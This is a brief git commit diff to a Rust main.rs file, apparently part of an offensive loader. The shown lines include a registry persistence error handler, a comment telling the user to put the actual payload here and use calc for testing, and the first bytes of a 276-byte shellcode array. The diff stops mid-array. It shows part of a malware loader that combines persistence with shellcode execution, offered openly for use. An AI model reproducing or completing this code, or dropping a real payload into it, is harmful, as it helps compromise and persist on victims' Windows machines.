Update main.rs

This commit is contained in:
S3N4T0R
2026-03-05 09:44:02 -05:00
committed by GitHub
parent cc73b7e0d6
commit 28fafa8331
@@ -449,7 +449,9 @@ fn main() {
Err(e) => eprintln!("[!] Registry persistence error: {}\n", e),
}
// ===== SHELLCODE =====
// ===== SHELLCODE =====
// Put the actual payload here, and use calc here for testing purposes only.
let shellcode: [u8; 276] = [
0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xc0, 0x00, 0x00, 0x00, 0x41, 0x51,
0x41, 0x50, 0x52, 0x51, 0x56, 0x48, 0x31, 0xd2, 0x65, 0x48, 0x8b, 0x52,